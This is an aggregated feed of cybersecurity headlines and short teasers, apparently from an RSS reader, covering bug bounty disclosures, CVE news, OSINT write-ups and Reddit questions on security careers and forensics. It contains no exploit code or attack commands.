    The Future of Bug Hunting “How OpenAI’s GPT-3 is Revolutionizing the Industry”
    In the world of technology, bugs are inevitable. These errors in code can cause programs to malfunction, create security vulnerabilities… Continue reading on Medium »
  • Open

    Unclaimed official s3 bucket of tendermint(tendermint-packages) which is used by many other blockchain companies in their code
    Cosmos disclosed a bug submitted by bhatiagaurav1211: https://hackerone.com/reports/1397826 - Bounty: $400
    CVE-2023-23914: curl HSTS ignored on multiple requests
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1813864
    CVE-2023-23915: HSTS amnesia with --parallel
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1814333
    connect.8x8.com: Users with no permission can track/access restricted details/data via GET /api/v2/support/requests/HTTP/2
    8x8 Bounty disclosed a bug submitted by emperor: https://hackerone.com/reports/1499114 - Bounty: $777
    connect.8x8.com: admin user can send invites on behalf of another admin user via POST /api/v1/users//invites
    8x8 Bounty disclosed a bug submitted by emperor: https://hackerone.com/reports/1474536 - Bounty: $777
    connect.8x8.com: deactivated users remain access to /api/v1/users/UUID/roles
    8x8 Bounty disclosed a bug submitted by emperor: https://hackerone.com/reports/1473071 - Bounty: $777
    jaas.8x8.vc: Removed users can still have READ/WRITE access to the workspace via different API endpoints
    8x8 Bounty disclosed a bug submitted by emperor: https://hackerone.com/reports/1479894 - Bounty: $777
    admin.8x8.vc: Member users with no permission can integrate email to connect calendar via GET /meet-external/spot-roomkeeper/v1/calendar/auth/init?..
    8x8 Bounty disclosed a bug submitted by emperor: https://hackerone.com/reports/1486310 - Bounty: $777
  • Open

    Dark Web Monitoring and OSINT Investigations for online protection
    Nowadays, more global corporations are conducting business online in this age of digital transformation. This provides numerous advantages… Continue reading on Medium »
    DarkNet OSINT Guide
    Guide to the dark side of the internet. Continue reading on The Sleuth Sheet »
  • Open

    Some pictures & videos of countries & cities
    I think promo pictures and videos of various cities and countries, https://www.mmvideo.fr/dvd/ submitted by /u/BustaKode [link] [comments]
  • Open

    Server-side prototype pollution: Black-box detection without the DoS
    submitted by /u/Gallus [link] [comments]
    Cross-Thread Return Address Predictions
    submitted by /u/Gallus [link] [comments]
    cURL audit: How a joke led to significant findings
    submitted by /u/Gallus [link] [comments]
    HAProxy Security Update (CVE-2023-25725) - HTTP content smuggling attack
    submitted by /u/Gallus [link] [comments]
    Google Lets Anyone See Original Uncropped Images – Proof of Concept
    submitted by /u/moxofoxo [link] [comments]
    Could Electric Vehicles Be Hacked? Meta-analysis on the risks of the EV ecosystem.
    A meta-analysis on the security risks linked to the EV ecosystem. Highlights include: a large number of connection points (Wi-Fi, phones, OTA updates, charging stations); a large number of computerized parts; potentially deadly disruptions (causing accidents, igniting batteries); potential to disrupt power grids; potential for worms that propagate via the charging network; flaws and PoC attacks; lack of laws or industry standards that limit wireless connections to critical components. submitted by /u/UnexpectedLizard [link] [comments]
  • Open

    SecWiki News 2023-02-15 Review
    No news updated today. For more of the latest articles, visit SecWiki
  • Open

    Mirai Variant V3G4 Targets IoT Devices
    We observed Mirai variant V3G4 targeting IoT devices in three separate campaigns in 2022. The post Mirai Variant V3G4 Targets IoT Devices appeared first on Unit 42.
  • Open

    One article explains it all | How to tackle the 17 major challenges of a secure application container architecture!
    As is well known, cloud computing and cloud-native technologies are widely adopted because they greatly improve cloud resource utilization and application delivery efficiency. However, their development has also exposed users to more advanced threats and attacks. How to build an effective cloud-native security management system to cope with ever-emerging security threats has long been a topic of concern and heated discussion among users across every industry. The Cloud Security Alliance (CSA) has released the report "Best Practices for Implementing a Secure Application Container Architecture", intended as a companion to the document "Challenges in Securing Application Containers and Microservices". "Challenges in Securing Application Containers and…
    FreeBuf Morning Report | Russia plans to exempt pro-Russian hackers from legal liability; Inner Mongolia names 19 apps that infringe user rights
    After the major earthquakes in Turkey and Syria, financial fraudsters are exploiting the natural disaster to trick people into donating to charities for personal gain.
    Online donation scams flourish after the Turkey and Syria earthquakes
    After the major earthquakes struck Turkey and Syria, financial fraudsters exploited the natural disaster to trick people into donating to charities for personal gain.
    Update now! Multiple security vulnerabilities in Apple products
    In 2022 Apple fixed a total of 10 0-days, 4 of which were found in WebKit.
    Penetration testing | Information gathering runs through the whole engagement
    There are only two kinds of people in this world: hackers and those who get hacked.
  • Open

    Exploring firmware decompression of a certain T router
    Author: sn0w_xxx@Knownsec 404 Team. Date: 15 February 2023. Tools prepared: 1. a certain T firmware 2. a certain T router 3. ida 4. binwalk 5. xz-5.6.2 6. squashfs-tools 7. 010 Editor. Starting the analysis. Initial firmware analysis: 1. Use binwalk -Me + firmware name to extract the file system from the firmware; extraction fails. 2. Use the binwalk -E + firmware name command to view the firmware's entropy...
  • Open

    HAProxy Security Update (CVE-2023-25725)
    Article URL: https://www.mail-archive.com/haproxy@formilux.org/msg43229.html Comments URL: https://news.ycombinator.com/item?id=34798082 Points: 2 # Comments: 0

  • Open

    Nice glossary for basics - An Droid
    submitted by /u/-Rammus- [link] [comments]
    Large dir of videos including an archive of Dr. Gene Scott's conspiracy infused tv sermons.
    Marking NSFW as I didn't explore too deep. Scott sure loved horses, UFOs, and Egyptian mythology. https://video.lemoin.com/mp4/ submitted by /u/inoculatemedia [link] [comments]
  • Open

    Saving Millions in 2023 with Specification-Guided Fuzzing
    Introduction Continue reading on Veridise »
  • Open

    Can anything be done to require egregious security holes such as Twitter spoofed blue accounts
    Having seen https://twitter.com/elonmusk/status/1625368108461613057?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1625368108461613057%7Ctwgr%5Ebfddd921861e4f88001269823af861be3ffd793c%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Fmetro.co.uk%2F2023%2F02%2F14%2Felon-musk-tries-to-force-feed-his-tweets-to-twitter-users-18280663%2F , I have to believe that this is a spoofed source since I don't think that even Elon Musk is that out of touch. I saw a few articles stating that people with verified accounts were able to change their name to Elon Musk and thus get tweets posted as belonging to Elon Musk. Is Twitter unable to stop this problem, even if it only involved people changing their display name to Elon Musk, and what does that say about security on the large social media sites? Are there any minimum standards for identity integrity? submitted by /u/PleaseThinkFirst [link] [comments]
    What's a decent cybersecurity salary in London?
    I have been offered an entry-level cybersecurity job in London, and wondering what's a decent salary there, according to the current situation in the industry and the cost of living there. I'm an EU citizen, quite new to cybersecurity (and by no means a seasoned expert), but I also have a few years' experience in other types of positions in tech companies, so not really a fully inexperienced worker either. I have: - A BSc in engineering - An MSc in cybersecurity - A 6-month internship in a mid-size cybersecurity consultancy firm (mostly pentesting) - 4 years' experience in another tech company (one of the big ones), not related to cybersecurity (most of this time I was managing a technical team but my job was not really technical) - I speak 3 languages, one of them being fluent English. Any info would be highly appreciated, just to make sure they are not lowballing me :D Regards! submitted by /u/BroX111 [link] [comments]
    FIPS 197 certification
    I am having trouble trying to understand FIPS 197 certification. Can any organization apply for this? Say I have a product which uses encryption. Does my product get certified, or is it that I am using certified encryption (FIPS) "WITHIN" my product. submitted by /u/87390989 [link] [comments]
    What OSI layers are these ports related to?
    I'm studying ports and I'm not sure which OSI layers the following ports correspond to: SMB 445, Syslog 514 (I think 4), IMAP4 993, Encrypted syslog 6514. Thank you for reading! submitted by /u/MrNoodlesLearns [link] [comments]
    Anyone using Cloudflare ZTNA and have any feedback?
    Have looked at Umbrella, Zscaler and Netskope, Cloudflare the last one we are gonna look at but anyone using it and have any thoughts especially if having used one of these others? submitted by /u/junkaccount1999 [link] [comments]
  • Open

    HTML injection that may lead to XSS on HackerOne.com through H1 Triage Wizard Chrome Extension
    HackerOne disclosed a bug submitted by jobert: https://hackerone.com/reports/1874260
  • Open

    Finding a Trace | Trace Labs Search Party CTF 2023
    I recently participated in the Search Party Capture The Flag (CTF) competition — a global event run by the non-profit organisation, Trace… Continue reading on Medium »
    Geo-location exercise.
    How I geo-located one of the video shooting sites from Miley Cyrus’s hit song, Flowers. This one is the first time I write about how I… Continue reading on Medium »
    Paste Sites — searching for leaked credentials
    Paste sites are sites where code and other data are shared in text form. Continue reading on Medium »
    Creating custom requests for Lampyre desktop app
    Even though we offer a huge list of over 230 types of requests, you may still need to enrich your investigation with more information: get… Continue reading on Medium »
  • Open

    Discover the 5 Best Automation Tools for Bug Bounty Hunters
    Bug bounty hunting is the practice of finding security vulnerabilities in websites, software,… Continue reading on Bug Zero »
    ChatGPT Hacking Prompts, SQLi, XSS, Vuln Analysis, Nuclei Templates, and more
    Several prompts for hacking with ChatGPT I’ve consolidated with demos. Continue reading on System Weakness »
    HTML Injection to RCE
    HTML injection, also known as cross-site scripting (XSS), is a type of vulnerability that allows attackers to inject malicious code into a… Continue reading on Medium »
    How I Discovered a Password Vulnerability
    Password security is an increasingly important topic as passwords are often used throughout the average person’s daily life. With so much… Continue reading on Medium »
  • Open

    Open-Source Vulnerability Management
    Article URL: https://docs.mergestat.com/blog/2023/02/13/open-source-vulnerability-management Comments URL: https://news.ycombinator.com/item?id=34792014 Points: 1 # Comments: 0
    Overcoming Developer Fatigue: Strategies for Streamlining Vulnerability Fixes
    Article URL: https://sysdig.com/blog/vulnerability-prioritization-fatigue-developers/ Comments URL: https://news.ycombinator.com/item?id=34791445 Points: 4 # Comments: 0
    Re: Double-free vulnerability in OpenSSH server 9.1 (CVE-2023-25136)
    Article URL: https://seclists.org/oss-sec/2023/q1/92 Comments URL: https://news.ycombinator.com/item?id=34786201 Points: 1 # Comments: 0
  • Open

    SecWiki News 2023-02-14 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    A Memory Resident Payload for CVE-2022-47966
    Article URL: https://vulncheck.com/blog/cve-2022-47966-payload Comments URL: https://news.ycombinator.com/item?id=34791132 Points: 9 # Comments: 0
  • Open

    HackDojo: search engine for top security conference presentations and whitepapers
    submitted by /u/sea__tak [link] [comments]
    A Different Payload for ManageEngine's CVE-2022-47966
    submitted by /u/chicksdigthelongrun [link] [comments]
    Exploiting a remote heap overflow with a custom TCP stack
    submitted by /u/Gallus [link] [comments]
  • Open

    FreeBuf Morning Report | Risk advisory for multiple vulnerabilities in Apple products; dark web revenue drops sharply after Hydra's demise
    An attacker can chain CVE-2023-23529 and CVE-2023-23514 to escalate privileges and escape the Safari sandbox.
    Hackers create malicious Dota 2 game modes to secretly deploy backdoors
    Dota 2 players take note: the game mode you use may well have been targeted by hackers.
    Tens of thousands of Americans defrauded, losses exceed 700 million dollars: why has Valentine's Day turned into a lovers' heist?
    Phishing experts warn that, with romance scams soaring, people should approach their love lives rationally.
    A brief discussion of cloud security technical practice and the shifting landscape | FreeBuf Consulting Insights
    Demand in the cloud security market is shifting from resource-centric to application-centric, including agile application delivery, rapid elasticity, smooth migration and lossless disaster recovery.
    Check for this zero-day now! More than 130 organizations worldwide already hit
    The Clop ransomware group recently exploited a zero-day vulnerability in the GoAnywhere MFT secure file transfer tool to steal data from more than 130 organizations.
  • Open

    How to see which IPs my Windows Server 2016 has interacted with
    Hi. We are looking into unauthorized email sent from our company's systems last week. The email was routed through our internal server machine running the MDaemon mail system (let's call the machine 172.22.22.22) to our external mail server (73.33.33.33) and from there to a Gmail address. Ofc these are not real IPs. The person whose account was used to send the email swears he did not send it. In fact he is the one who notified us when he noticed the unrecognized email in his sent box. Also the email contains a "sent from my galaxy" footer, and this person does not own any Samsung/Galaxy devices. So I want to identify which device/client exactly connected to 172.22.22.22 to initiate the mail. Our firewall application logs don't record anything beyond 2 hours. Any sniffer logs seem to be not recording anything AT ALL. While we fix these problems, any chance I might get a list of IPs that connected to the server at the time of the email anywhere else? submitted by /u/saadjumani [link] [comments]
  • Open

    Assumed Breach Assessment Case Study: Uncovering WeSecureApp’s Approach
    This blog post focuses on the Assumed Breach Assessment approach with an assessment case study performed by the WSA team. But first, Continue reading on Medium »
    Automate Boring Red Team Tasks, SSH Wrappers
    Secure Shell (SSH) is a secure network protocol that is widely used for remote administration of computers, data transfer, and connecting… Continue reading on Medium »
  • Open

    7 Ways Threat Actors Deliver macOS Malware in the Enterprise
    submitted by /u/dmchell [link] [comments]
  • Open

    Training and CTFs
    The military has a couple of adages...one, "you fight like you train", and another being, "the more you sweat in peace, the less you bleed in war." The idea behind these adages is that progressive, realistic training prepares you for the job at hand, which is often one performed under "other than optimal" conditions. You start by learning in the classroom, then in the field, and then under austere conditions, so that when you do have to perform the function(s) or task(s) under similar conditions, you're prepared and it's not a surprise. This is also true of law enforcement, as well as other roles and functions. Given the pervasiveness of this style of training and familiarization, I would think that it suffices to say that it's a highly successful approach. The way DFIR CTFs, while fun,…

  • Open

    How would you proceed to recover data from these ancient devices?
    submitted by /u/L4Z3R_H4WK [link] [comments]
    .LNK files on secondary storage
    I'm examining an Omen HP laptop that had one M.2 SSD and one HDD for storage. What would be the reason that a .LNK discovered on the HDD points to the C: drive? The .LNK file of interest points back to C:\Users*target*. This user name differs from the one currently on the OS drive. submitted by /u/comoestasbitcheZ [link] [comments]
    HDD Repair and data recovery for forensics
    Where can I study cleanroom hard drive repair? I'd like to start with repairs and data recovery, but I can't find anything. They asked me 4200 Euros for a 3-day course, but I can't afford this expense submitted by /u/Zipper_Ita [link] [comments]
    Career
    This is a bit of a weird and open-ended question - but how do people find working in digital forensics who have been employed in this role for a while? Particularly in a law enforcement setting - rewarding? Difficult? Pros and cons? Training? Thanks all submitted by /u/OkGrape5530 [link] [comments]
  • Open

    What would you say is the difference between a senior Application Security Engineer vs non senior?
    I think the title speaks for itself :) submitted by /u/herbertisthefuture [link] [comments]
    I really need to stop looking at logs. Am I paranoid now?
    I noticed on my ATT router that I received several ICMP Echo Requests and general discards from an IP belonging to Tenable. Tenable is basically a vulnerability tester, right? Could someone be using Nessus or something else to target me? 10 times this IP was logged, a few times for echo request and discards for the other. UDP, TCP and ICMP. Am I crazy or is this indicative of someone basically pen testing my home network? Thanks for your time submitted by /u/themostofpost [link] [comments]
    what would a full scale war in cyberspace look like?
    With things heating up in Eastern Europe and with China, it seems like it would be inevitable that we would have to deal with direct confrontation with Russia and China eventually. Being that both countries are not only nuclear superpowers but also have cyber capabilities, I am coming to wonder what it would look like in the cyber sphere when that confrontation happens? submitted by /u/milesofjoy87 [link] [comments]
    LinkedIn: Counter-OSINT of Those Who Swarmed My Canary Profile
    I keep a LinkedIn account, with my name, all of the privacy settings set to maximum, except for hibernation. It is intentionally difficult to find. I pay for LinkedIn Premium to get insights into who searches for me. I use this account as a "canary" to detect when people are trying to look me up. Activity on the account is relatively low. Recently, I was overwhelmed by 50 accounts in the space of only one hour. Most accounts were sock puppets, using private or semi-private modes. The results from LinkedIn of who visited my profile were as follows: Someone on LinkedIn; Someone at Big Company; Business Owner from Atlanta Metro Region; Doctor at Saint Fictious Hospital. I'm working to identify who viewed me. Tiny companies are generally easy; the results of "Someone on LinkedIn" are not findable. LinkedIn's normal user search tools are not sufficient for entries such as "Doctor at Saint Fictious Hospital." What OSINT tools specific to LinkedIn would you recommend to better search LinkedIn profiles, besides Google, or LinkedIn itself? Any decent recruiter / lead style tools? Paid and unpaid tools are both viable options. submitted by /u/opethharlequinforest [link] [comments]
    Question about website
    Hi guys, I don't know where else to ask but I was working on a project and clicked on a random website that instantly closed. I checked VirusTotal and it came up safe with 0/90, then booted up my VM to check what the website was doing and there was nothing suspicious, no weird calls or communication, no files downloaded, so I was wondering if there's anyone who can check the website for me in case I missed something, because I'm curious why it immediately closed without me doing anything but I can't recreate it anymore. Update mid-posting: I clicked on it from a Google link originally and tried doing it again on my VM and it seems to redirect me to a website called illuminatelocks which seems to just redirect like 3 times till finally landing on a random page, but on my VM it isn't auto closing. Checking the Firefox network tab nothing is downloaded, but just to make sure can anyone give me a second opinion? I can provide links if needed. Thank you in advance. Update: After a while I tried to find the Google result and I can't seem to find it anymore, and with the Google URL it's no longer redirecting me to illuminatelocks but rather staying on the original page this time. submitted by /u/al_ce [link] [comments]
    Is my iPhone hacked?
    So one of my phones iPhone6gwas draining its battery ridiculously fast so I got some logs. Came across a file with this inside… What do you think? S Treatmentios-feature-remoteconfiguration2remoteconfig_unauth_system_test@ߐ@ F Treatmentios-feature-unauth2remoteconfig_unauth_system_test@��@ J Blue*ios-feature-remoteconfiguration2button_color_dummy_property@��A *ios-feature-carplayv22siri_alternate_search_results@��B¿ګ�0$38e8835e-95e0-5030-9469-bd022815fffc submitted by /u/Accomplished-Paper81 [link] [comments]
    Variation of the Vigenère cipher.
    There is this variation of the Vigenère cipher which contains special characters ([|'/<) as well as the normal alphabet (A-Z). How do you decrypt it into plain text? submitted by /u/Somechords77 [link] [comments]
    do all cybersecurity jobs require you to be able to get up at 3AM to respond to an incident?
    So I'm thinking of trying to become either a penetration tester or cybersecurity engineer. Right now I'm most of the way through HTB Academy's InfoSec Fundamentals path but I have A+ and CCNA certifications and I'm working on practice tests for Sec+. I know I don't want to do incident response. My question is do any cybersecurity jobs NOT require me to have to get up arbitrarily at 3AM? If so, which ones? submitted by /u/notburneddown [link] [comments]
  • Open

    N.J. hospital admits data breach involving thousands of patients
    submitted by /u/irckeyboardwarrior [link] [comments]
    How I hacked into a Telecom Network — Part 1 (Getting the RCE)
    submitted by /u/TheCyb3rAlpha [link] [comments]
    Verified Security Test: Malicious File vs EDR
    submitted by /u/DH_Prelude [link] [comments]
    RCE in Western Digital PR4100 NAS (OS 3)
    submitted by /u/albinowax [link] [comments]
  • Open

    Promotion code can be used more than redemption limit.
    Stripe disclosed a bug submitted by d_sharad: https://hackerone.com/reports/1717650 - Bounty: $250
    The Deleted Polls are Still Accessible after 30 Days
    Twitter disclosed a bug submitted by eissen5c: https://hackerone.com/reports/1015373 - Bounty: $560
    Splunk Sensitive Information Disclosure @axiellstore.usahec.org
    U.S. Dept Of Defense disclosed a bug submitted by spell1: https://hackerone.com/reports/1860905
  • Open

    Bypassing CORS configurations to produce an Account Takeover for Fun and Profit
    The bug that is being written about here is from a previous bug bounty engagement for a major telecommunication company. Continue reading on InfoSec Write-ups »
    Bypassing CORS configurations to produce an Account Takeover for Fun and Profit
    The bug that is being written about here is from a previous bug bounty engagement for a major telecommunication company. Continue reading on Medium »
    Logic Error Bug Fix Review
    High severity bug discovered by white hat hacker through bounty platform Immunefi Continue reading on Balancer Protocol »
    The Top Bug Bounty Programs of the Year and How to Maximize Your Earnings
    As a seasoned bug bounty hunter, I can tell you that the world of cybersecurity is constantly evolving, with new vulnerabilities and… Continue reading on Medium »
    The Secret Weapon of Successful Bug Bounty Hunters: NMap NSE Scripts
    Hi guys, This is my first article. As a bug bounty hunter, navigating the vast and complex world of cybersecurity can often feel like… Continue reading on Medium »
    Bug Bounty Programs and Bug Hunters
    Bug bounty programs are platforms that are created by ICT-related companies which allow non-biased computer error hunters/ hackers to… Continue reading on Bug Zero »
    The Role of Artificial Intelligence in Bug Bounty Hunting
    The world of bug bounty hunting is constantly evolving and with the advancements in technology, the role of Artificial Intelligence (AI)… Continue reading on Medium »
    “Hacking for Glory” The Most Inspiring Bug Bounty Hunting Success Stories and Lessons Learned
    Bug bounty hunting is a lucrative and ever-growing field in the world of cybersecurity. With more and more organizations offering bug… Continue reading on Medium »
    What is Bug Bounty? And how do you learn it? - Bahasa Indonesia
    A Bug Bounty hunter, or BugHunter, is someone who understands many areas of cybersecurity and is experienced enough in finding… Continue reading on Medium »
    The Most Notable Bug Bounty Hunting Success Stories and Lessons Learned
    Bug bounty hunting has become a lucrative and exciting field, attracting hackers and security enthusiasts from all over the world. The… Continue reading on Medium »
  • Open

    Searching for missing people online
    Last weekend I took part in a capture the flag (CTF) competition run by Trace Labs — a crowd-sourced non-profit organisation to help… Continue reading on Medium »
    Day 30 — Searchlight — IMINT • Walkthrough • TryHackMe
    Today is my 30th day on this journey; we are going to solve the CTF named Searchlight. This time there is no use of the terminal : ) Continue reading on Medium »
    CTF Writeup: LA CTF 2023
    This weekend I participated in LA CTF 2023, which went on between 11 Feb. 2023, 04:00 UTC — 12 Feb. 2023, 22:00 UTC. This blog post… Continue reading on Medium »
    How to generate geographical information about a phone number using the “Phonenumbers” Python module.
    This entertaining article will show you how to generate geographical information about a phone number using “Phonenumbers” in Python. Continue reading on Medium »
    How did I use Shodan.io to hack my University?
    Shodan finds an FTP anonymous vulnerability in my organization and allows anyone to log in to an FTP server without a username or… Continue reading on Medium »
    Performing OSINT on Corporate Targets
    How to gather essential information about a company. From physical intel to identifying infrastructure assets, we’ll cover it all. Continue reading on Medium »
    Have a safe flight (hacking the boarding pass)
    By now we should all be (more or less) aware that the internet can be a dangerous place and sharing personal information might not always… Continue reading on InfoSec Write-ups »
    OSINT Challenge: 42 Madrid
    OSINT (Open Source Intelligence) is the process of finding relevant information of an asset through open source information. This is… Continue reading on Medium »
    OSINT Quizzes I Found On Twitter
    Two OSINT geographical quizzes that i solved recently. Continue reading on Medium »
  • Open

    How I hacked into a Telecom Network — Part 1 (Getting the RCE)
    submitted by /u/TheCyb3rAlpha [link] [comments]
    How I Hacked A Company (My First Red Team Engagement 🚩)
    submitted by /u/glum-platimium [link] [comments]
    How your messenger used for internal communication (Teams or S4B) might compromise your company
    https://badoption.eu/blog/2023/02/12/S4B_Teams.html A conglomeration of techniques for S4B and Teams and their risks. Nothing really innovative, but as this works so often in the real world, I just wanted to raise awareness of this. submitted by /u/PfiatDe [link] [comments]
  • Open

    Threat Hunting — (Threat Intelligence)
    Threat hunting is a proactive security technique that actively searches for potential threats and vulnerabilities within a network. This… Continue reading on Medium »
  • Open

    Cyber Attack and Defense: The Art of “Left Hand Fighting Right Hand”
    This article introduces a method for studying and analyzing cybersecurity confrontation techniques from both the attack and the defense dimensions.
    HackTheBox machine Squashed
    - Discovering and exploiting NFS misconfigurations - Managing users via the Linux command line - Exploiting a system's X11
    FreeBuf Morning Report | Pepsi supplier hit by ransomware attack; Russia considers exempting hackers acting in the national interest
    Russian media report that Alexander Khinshtein, chairman of the Duma's Information Policy Committee, announced that the Russian government is evaluating exempting hackers acting in Moscow's interests from punishment.
    Warning! PyPI Python packages contain multiple kinds of malicious code
    Researchers discovered four different rogue packages in the Python Package Index (PyPI).
    California healthcare organization suffers data breach, 3.3 million patients affected
    Cybersecurity experts remind affected patients to watch out for phishing attacks, scams, social engineering, or extortion using the stolen data.
    Learning the Spring Source Code from Zero, Part 1: The Bean Injection Process
    Through this article, readers with no prior source-code background can begin studying the Spring source code and, by extrapolating from it, enter the world of source code from here! Since this is my first time reading the source, the article will inevitably contain some issues; please bear with me and point them out!
    Witnessing history? 4.5 billion domestic express-delivery records reportedly leaked
    On the evening of February 12, a Telegram bot leaked 4.5 billion domestic express-delivery records, with the data package reaching 435 GB!
    中睿天下 & Coremail jointly release the “2022 Q4 Enterprise Email Security Report” (download attached)
    中睿天下, together with the CAC Email Security Big Data Center, released the “2022 Q4 Enterprise Email Security Report”.
    Opportunities to detect lateral movement with the Sliver framework
    Sliver has now become the third-largest C&C framework after Cobalt Strike and Metasploit, and targeted detection of it has become a hot topic.
    FreeBuf Morning Report | 7 Russians sanctioned over ransomware; ChatGPT will hit Indian IT outsourcing companies
    On the 9th, the UK and US governments imposed sanctions on seven Russian nationals for their links to the TrickBot, Ryuk, and Conti cybercrime operations.
  • Open

    SecWiki News 2023-02-13 Review
    Partial list of 2023 National Natural Science Foundation of China topics in the security field by ourren; Research on using Tailscale in internal network penetration by 路人甲; A comparative analysis of VirusTotal's engines versus the desktop-edition engines by Avenger; SecWiki Weekly (Issue 467) by ourren. For more of the latest articles, visit SecWiki
  • Open

    Step-1 in Cybersecurity “How to Spot Phishing Emails?”
    According to a report by Verizon, 32% of all data breaches involve phishing. In this article, we will see how to spot phishing emails and… Continue reading on InfoSec Write-ups »
    5G Security: Understanding the Risks and How to Mitigate Them
    No content preview
    OWASP Top 10: A Guide for Pen-Testers & Bug Bounty Hunters
    In this article, we will look at OWASP and the top 10 web application vulnerabilities from OWASP. This is a useful topic for both web app… Continue reading on InfoSec Write-ups »
  • Open

    How to make an open directory accessible locally only?
    Hi all, I don’t know if this is the right place to post this, but here goes: I want to share my media library with guests who occasionally connect to my network via wifi so they can watch what they want on their own devices, basically sharing my library without the need to share login credentials with them one by one. I was thinking that the most elegant solution would be to host a local website (currently trying to make one in localwp) which has an index of my library. How would I go about making an index of my hard drives as if it were open directories? submitted by /u/louiestonanto [link] [comments]
    Should I use a vpn when downloading from filepursuit?
    Because I just did, and after I left the website I went to Google something and I got redirected to an error page that said "unusual traffic from your computer network." Granted, my VPN was being really glitchy and disconnecting, then reconnecting, then disconnecting, etc... Could that have been why I got an error page? When I'm streaming or ripping from illegal streaming sites I always do, but I just discovered filepursuit and thought "this seems pretty straightforward." Should I use one? submitted by /u/Throwaway19992003 [link] [comments]

  • Open

    Parse SSH logs in debug mode
    Do you know any light parser-visualisator for SSH debug mode? submitted by /u/athanielx [link] [comments]
    I need some help/advice understanding something on android.
    When I typed the code *#21# into my keypad, it came back as "call forwarding unconditionally" while then showing voice, data, etc as "not forwarded". What does this mean, and what exactly is being forwarded, and to where? submitted by /u/ExitNo9158 [link] [comments]
    Template for submitting IOCs of hacked sites to their owners?
    I do what I've come to understand is called "threat hunting", and I know there are agreed-upon templates for hackers disclosing vulnerabilities, but what about after the fact? How do you properly, and with authority, inform website owners that the security (or lack thereof) of their site or app has been breached? What I've done so far is simply to describe the IOCs and add my best guess in terms of entry point. As you might imagine, it's totally ignored 95% of the time. submitted by /u/C0ffeeface [link] [comments]
    What should I use for privacy security in home network - firewall + vpn router or ?
    We have a very small network: desktop + Chromecast and a couple of smartphones, all on wifi. We currently have an R6250 router and want to upgrade. Someone suggested a firewall plus VPN router, but I am not sure what we should do. If you also suggest a physical firewall and VPN router, please give us the model number of your choice. Is it possible to get both a firewall and a VPN router in one device? Also, even if we have a VPN router, we need a third-party service like NordVPN or similar, correct? submitted by /u/curiosityv [link] [comments]
    Are there any good reasons an average workstation needs to connect to WMI?
    I realize there are some reasons for WMI on servers, but do workstations have any good reason to be able to reach WMI ports? submitted by /u/Outrageous_Dot_1113 [link] [comments]
    Free resource or course to prepare for OSCE
    Hi guys, I am looking for free resources to learn exploit development, such as AV bypass, etc. Can anyone help me or give me a proper guide on how to learn it? submitted by /u/geeky_gopher [link] [comments]
    Why would ESTsecurity be malware?
    Today my friend sent me a link to download a program via mega, but before downloading it I checked the file through VirusTotal, in which it checked all the files present as 'safe', except for one: ESTsecurity. In the brief research I did I discovered that it was an antivirus, even indicated by some people. But why would an antivirus be in a program download and why would it be insecure? submitted by /u/3tigrestristes [link] [comments]
  • Open

    The importance of fuzzing and unit tests
    Table Of Content Continue reading on Medium »
  • Open

    Learning Web-Sec - Day 16 - Authentication Vulnerabilities
    2FA simple bypass - PortSwigger Lab Walkthrough Continue reading on System Weakness »
    SSRF That Allowed Us to Access Whole Infra Web Services and Many More
    Hi this is Basavaraj back again with another writeup on SSRF. Continue reading on Medium »
    Unlocking the Power of Observation: How Experienced Hackers Stand Out in a Sea of Amateurs
    Hackers have a superpower “Observation” but it doesn’t come naturally, a hacker gains it with experience and brainstorming but as… Continue reading on System Weakness »
    IDOR Leads to MASS Account Takeover
    In most web applications, there is a high prevalence of misconfiguration problems, particularly with regard to authorization. Continue reading on Medium »
    Introduction Web3 hacking Part1
    Web 1.0 is the term used for the earliest version of the Internet & its all about fetching and reading the data Continue reading on Medium »
    Google Hacking
    Google hacking, also named Google dorking, is a hacker technique that uses Google Search and other Google applications to find security… Continue reading on Medium »
    Awesome bro! keep it going, I'd like to collab with you.
    Continue reading on Medium »
  • Open

    Raptor - imaging tool
    I am looking for the most recent version of raptor. For the life of me I can not find a download page. I have read that ownership of the software has switched hands quite a few times. Any help appreciated, thanks. submitted by /u/Novel-Damage2050 [link] [comments]
  • Open

    Help a newbie find his way in malware development
    I'm a computer security enthusiast and aspiring malware developer looking for some guidance and resources. Can anyone point me in the right direction for some free resources to get started with malware development? Bonus points if you can throw in a roadmap for me to follow! Thanks for your help, I'm looking forward to learning from all of you! submitted by /u/AcidOP_69 [link] [comments]
  • Open

    Jenis Pengumpulan Informasi OSINT
    Ada berbagai sumber yang dapat digunakan untuk pengumpulan informasi OSINT, namun tidak terbatas pada media sosial, mesin pencari, dan… Continue reading on Medium »
    Vital Lessons I Learned from OSINT Techniques Book
    Discover the valuable lessons learned from the 10th edition of the OSINT Techniques Continue reading on Medium »
    SPY NEWS: 2023 — Week 6
    Summary of the espionage-related news stories for the Week 6 (February 5–11) of 2023. Continue reading on Medium »
    Hacking surveillance cameras
    Let’s talk about finding IP cameras and gaining access to them… The following description is not a guide to action and should not be used… Continue reading on Medium »
    Air Superiority over Ukraine. Easy to Want, Hard to Obtain.
    As we approach the first anniversary of the 3 day Special Military Operation, we thought we’d take a closer look at some of the more… Continue reading on Medium »
  • Open

    HWSyscalls is a new method to execute indirect syscalls using hardware breakpoints, HalosGate and a synthetic trampoline on kernel32 with hardware breakpoints.
    submitted by /u/Idov31 [link] [comments]
    How curious are you?
    submitted by /u/NemanjaVas [link] [comments]
    CHERIoT: Rethinking security for low-cost embedded systems - Microsoft Research
    submitted by /u/Gallus [link] [comments]
  • Open

    SecWiki News 2023-02-12 Review
    ZKP in Hidden Order Group: zero-knowledge proofs in groups of unknown order by ourren; The full process of compromising a telecom operator, from external foothold to internal lateral movement by ourren; Typical WeChat leak cases nationwide in 2022 by ourren; The impact of ChatGPT on cybersecurity by ourren; A preliminary exploration of ChatGPT applications in security operations by ourren; Multiple ways of performing forensics on program execution traces by ourren. For more of the latest articles, visit SecWiki
  • Open

    Robust Security Network and Extended Authentication Protocol in Detail
    submitted by /u/tbhaxor [link] [comments]
  • Open

    BROKEN FUNCTION LEVEL AUTHORIZATION [API SECURITY — 0x2]
    No content preview
    SQL INJECTIONS
    No content preview
  • Open

    Game Of Active Directory v2 — Winterfell — Part 1 [Spanish]
